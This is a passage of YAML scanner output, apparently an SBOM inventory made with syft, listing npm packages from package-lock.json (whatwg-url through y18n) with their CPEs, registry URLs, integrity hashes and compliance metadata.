urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/whatwg-url@5.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz
|
|
integrity: sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==
|
|
dependencies:
|
|
tr46: ~0.0.3
|
|
webidl-conversions: ^3.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 10cad46c067a700f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: which 2.0.2'
|
|
title: which 2.0.2
|
|
description: 'Package discovered: which 2.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 414763db2a64d1aa
|
|
name: which
|
|
version: 2.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/which@2.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/which/-/which-2.0.2.tgz
|
|
integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==
|
|
dependencies:
|
|
isexe: ^2.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 20ac7377e7b68a5f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: which-module 2.0.1'
|
|
title: which-module 2.0.1
|
|
description: 'Package discovered: which-module 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e9c9cc83bf436fd2
|
|
name: which-module
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/which-module@2.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz
|
|
integrity: sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9ffab25d563bb6a3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: wrap-ansi 6.2.0'
|
|
title: wrap-ansi 6.2.0
|
|
description: 'Package discovered: wrap-ansi 6.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1fadca0371d5cfaf
|
|
name: wrap-ansi
|
|
version: 6.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/wrap-ansi@6.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz
|
|
integrity: sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==
|
|
dependencies:
|
|
ansi-styles: ^4.0.0
|
|
string-width: ^4.1.0
|
|
strip-ansi: ^6.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: '8455272704618757'
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: wrap-ansi 7.0.0'
|
|
title: wrap-ansi 7.0.0
|
|
description: 'Package discovered: wrap-ansi 7.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 336621830c576ca4
|
|
name: wrap-ansi
|
|
version: 7.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/wrap-ansi@7.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz
|
|
integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==
|
|
dependencies:
|
|
ansi-styles: ^4.0.0
|
|
string-width: ^4.1.0
|
|
strip-ansi: ^6.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 686325d7e763de93
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: wrap-ansi 8.1.0'
|
|
title: wrap-ansi 8.1.0
|
|
description: 'Package discovered: wrap-ansi 8.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 49a7c54fcd626265
|
|
name: wrap-ansi
|
|
version: 8.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/wrap-ansi@8.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz
|
|
integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==
|
|
dependencies:
|
|
ansi-styles: ^6.1.0
|
|
string-width: ^5.0.1
|
|
strip-ansi: ^7.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 20b8ef0a2e52c375
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: wrappy 1.0.2'
|
|
title: wrappy 1.0.2
|
|
description: 'Package discovered: wrappy 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3d054461229ae629
|
|
name: wrappy
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/wrappy@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz
|
|
integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d249fddb72dddcbc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: ws 8.18.3'
|
|
title: ws 8.18.3
|
|
description: 'Package discovered: ws 8.18.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 20d4f853542f41c9
|
|
name: ws
|
|
version: 8.18.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/ws@8.18.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/ws/-/ws-8.18.3.tgz
|
|
integrity: sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c71da5915aeb2537
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: xmlbuilder 13.0.2'
|
|
title: xmlbuilder 13.0.2
|
|
description: 'Package discovered: xmlbuilder 13.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0872acd31442749a
|
|
name: xmlbuilder
|
|
version: 13.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/xmlbuilder@13.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz
|
|
integrity: sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fd4707cd0572bee3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: xmlhttprequest-ssl 2.1.2'
|
|
title: xmlhttprequest-ssl 2.1.2
|
|
description: 'Package discovered: xmlhttprequest-ssl 2.1.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9551f10f27f0ee2d
|
|
name: xmlhttprequest-ssl
|
|
version: 2.1.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/xmlhttprequest-ssl@2.1.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz
|
|
integrity: sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a5a624f94f45bfc0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: xtend 4.0.2'
|
|
title: xtend 4.0.2
|
|
description: 'Package discovered: xtend 4.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6f2d4b5e4aa5bc10
|
|
name: xtend
|
|
version: 4.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/xtend@4.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz
|
|
integrity: sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5d318a2cd2d1309b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: y18n 4.0.3'
|
|
title: y18n 4.0.3
|
|
description: 'Package discovered: y18n 4.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f92fb588898c98cc
|
|
name: y18n
|
|
version: 4.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/y18n@4.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz
|
|
integrity: sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ff7837262c7a0506
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: y18n 5.0.8'
|
|
title: y18n 5.0.8
|
|
description: 'Package discovered: y18n 5.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 17090a29739955b3
|
|
name: y18n
|
|
version: 5.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/y18n@5.0.8
|
|
